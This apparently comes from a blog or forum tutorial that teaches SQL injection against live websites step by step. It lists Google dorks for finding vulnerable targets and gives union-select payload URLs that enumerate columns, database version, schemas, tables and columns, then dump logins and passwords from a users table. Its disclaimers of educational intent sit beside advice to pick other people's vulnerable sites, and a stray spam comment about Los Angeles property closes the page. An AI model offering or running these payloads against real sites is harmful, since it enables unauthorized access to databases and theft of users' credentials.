This is for educational purposes only. I am not responsible for your actions based on the content provided.
How to SQLI
How to SQLI
Hey everyone! I'm Epic, and today I will be teaching you how to SQLI, I will do this in a question-answer format, I will start with a broad question at the beginning of every step, and clarify the answer beneath it, I think this is the simplest, easiest way to teach you. I would like to state a few things: I have only attempted SQLI on websites I own and create, I do not recommend or encourage you use this to "hack" websites that are not your own property and creation. This thread is meant for research and education purposes, not to supply or support hackers. I do not condone or support illegal hacking. I am not responsible for consequences should you partake in illegal hacking. I am not responsible for anyone who interprets this thread incorrectly and uses it for illegal hacking.
Now that we've gotten that out of the way, lets begin!
SOME THINGS TO REMEMBER WHILE READING THIS GUIDE
This is not the easiest method, there is an easier, less-involved method beneath, though some find this "completely on your own" method more satisfying. Anything within CODE tags represents the doing part of a step, the part where you will actually do/enter something (you may have to click enter/return to reload your browser). The text and pictures help to keep you on track and explain what's going on.
What is SQLI?
SQLI stands for SQL Injection. What's SQL? It stands for Structured Query Language. Structured Query Language is a database computer language designed for managing data in relational database management systems (RDBMS). Structured Query Language Injection is when you "inject" (hack) into a website, you can steal data, or you can upload your own data (some might call this defacing a website).
Okay, how do I start?
Well you start by finding a "vuln host" as many tutorials describe it. Basically, you need to find a vulnerable website that will allow you to SQLI. Not all websites are vulnerable using SQLI, while all websites are at risk to some form of hacking, it may be to secure and well coded to SQLI.
First off, you'll need "dorks". Here are a few dorks that you can use (although there's many more):
Code:
inurl:index.php?id= inurl:news.php?id= inurl:category.php?id= inurl:games.php?id= inurl:forum.php?tid= inurl:newsletter.php?id= inurl:content.php?id=
You saying I'm a dork? - Now what?
Let's say you're on this website:
Code:
http://site.com/news/view.php?id=828
How do I find the right number of columns?
You need to find the right amount of columns by using the "order by" command:
Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal) http://site.com/news/view.php?id=828 order by 2-- (page loads normal) http://site.com/news/view.php?id=828 order by 3-- (page loads normal) http://site.com/news/view.php?id=828 order by 4-- (page loads normal) http://site.com/news/view.php?id=828 order by 5-- (page loads normal) http://site.com/news/view.php?id=828 order by 6-- (page loads normal) http://site.com/news/view.php?id=828 order by 7-- (page loads normal) http://site.com/news/view.php?id=828 order by 8-- (page loads normal) http://site.com/news/view.php?id=828 order by 9-- (error)
Now we will use the "Union Select" command:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
is reflective on the number of columns the website has, so if your website only had two columns you'd enter 1,2.This will make the website show some numbers on the screen:
If so, the website is definitely SQLI vulnerable, and ready to hack.
How do I get mySQL and Current User?
Now we need to know the MySQL version, if its over 5 (hopefully it is) we'll be able to hack it. If its under 5 I STRONGLY urge you to find a different website, it will be difficult for beginners because when its under 5 you'll have to randomly guess the tables and columns.
Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
To get the current user, enter this:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
How do I get the Databases?
Now we wanna find the databases and the Current database.
Here is the syntax for all databases:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
Now we would like to now what is the current database, it's pretty obvious in this case but useful sometimes.
Syntax for current database:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
How do I get the tables?
Now we want to know the tables in the database and for this we will continue using "union select".
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
We now know that the table (based on the data we have received) that passwords should be stored in are called "users" or anything that looks like that, write it down and move on.
How do I get columns?
Now we want to know the columns.
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
How do I finally get the account info? How do I dump user/pass?
Now you want to dump logins and passwords from bpusers:
Here is the code for that:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--
(NOTE: 0x3a will make a : between logins and passwords.)
Congratulations, you should have successfully completed an SQLI attack.
Los Angeles …Look at the site…News about residential income/rental property in Los Angeles.
ReplyDeleteLos Angeles Housing Dept